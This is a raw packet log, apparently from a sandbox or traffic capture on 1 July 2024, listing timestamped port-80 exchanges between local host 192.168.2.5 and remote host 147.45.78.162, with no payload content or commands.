Jul 1, 2024 13:02:14.669092894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.669123888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.669133902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.669145107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.669195890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.669236898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.669476986 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.670605898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.670617104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.670627117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.670695066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.670706034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.670716047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.670721054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.670744896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.670763016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.670763016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.670811892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.073127031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.077949047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272599936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272614956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272624016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272634983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272648096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272669077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.272689104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.272727013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.272783995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272794008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272842884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.272874117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272882938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272893906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272905111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.272914886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.272943020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.294601917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.294631958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.294658899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.294666052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.294677973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.294701099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.294728994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.296236992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.296264887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.296278000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.296279907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.296333075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.296334982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.296344995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.296389103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.298979044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.299024105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.299035072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.299041986 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.299062967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.299067974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.299077034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.299103975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.302138090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.302170038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.302181005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.302200079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.302208900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.302222967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.302263975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.304111958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.304157972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.304162979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.304171085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.304197073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.304202080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.304220915 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.304239035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.306715012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.306746006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.306756973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.306782961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.306790113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.306804895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.306839943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.315776110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.315815926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.315824986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.315828085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.315851927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.315865040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.315872908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.315906048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.317899942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.317969084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.317979097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.317980051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.318010092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.318012953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.318052053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.320830107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.320856094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.320866108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.320883036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.320905924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.320962906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.322439909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.322465897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.322477102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.322488070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.322510958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.322518110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.322556973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.325665951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.325700998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.325711012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.325726986 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.325752020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.325762987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.325798035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.326880932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.326934099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.326961994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.326972961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.326982975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.327003002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.327024937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.329842091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.329866886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.329878092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.329893112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.329916954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.329929113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.329941988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.329962969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.332298994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.332360983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.332365036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.332371950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.332382917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.332403898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.332433939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.333127975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.333158016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.333165884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.333173990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.333203077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.333225012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.333234072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.333273888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.335530043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.335553885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.335591078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.335623026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.335625887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.335668087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.335669994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.335679054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.335711956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.336719990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.336745024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.336754084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.336766958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.336786985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.336791039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.336796045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.336816072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.336836100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.338779926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.338826895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.338830948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.338839054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.338872910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.338874102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.338931084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.339277983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.339322090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.339328051 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.339332104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.339360952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.339366913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.339370012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.339402914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.340990067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.341015100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.341023922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.341032028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.341057062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.341073036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.341130972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.342626095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.342650890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.342659950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.342679024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.342703104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.342745066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.342787981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.343986988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344036102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.344042063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344052076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344085932 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.344094992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.344147921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344157934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344192028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.344873905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344899893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344911098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344923973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.344937086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.344950914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.344981909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.345350027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.345391989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.345395088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.345406055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.345433950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.345452070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.345473051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.345518112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.346930981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.346956015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.346978903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.346997976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.347007036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.347048998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.347052097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.347063065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.347095966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.348503113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.348556995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.348579884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.348589897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.348598957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.348619938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.348643064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.349287987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.349332094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.349337101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.349342108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.349364996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.349375010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.349394083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.349405050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.350501060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.350526094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.350547075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.350568056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.350589037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.350600004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.350630999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.350656986 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.351378918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.351444006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.351449013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.351455927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.351466894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.351492882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.351501942 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367106915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367120028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367130995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367178917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367213964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367225885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367237091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367240906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367249012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367269039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367297888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367420912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367430925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367443085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367454052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367464066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367465019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367491961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367515087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367598057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367639065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367650032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367661953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.367690086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.367707968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.390821934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.390876055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.390897989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.390908957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.390933990 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.390954018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.391020060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.391031027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.391041040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.391050100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.391062021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.391079903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.391114950 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.396662951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396708965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396712065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.396718025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396740913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.396784067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.396807909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396817923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396827936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396838903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396851063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.396881104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.396945953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.396985054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.401160002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401211977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401213884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.401222944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401258945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.401294947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401307106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401319027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401335001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.401365995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.401365995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.401422024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401433945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.401464939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.412616014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.412628889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.412638903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.412664890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.412702084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.412730932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.412740946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.412751913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.412761927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.412770987 CEST	49705	80	192.168.2.5	147.45.78.162
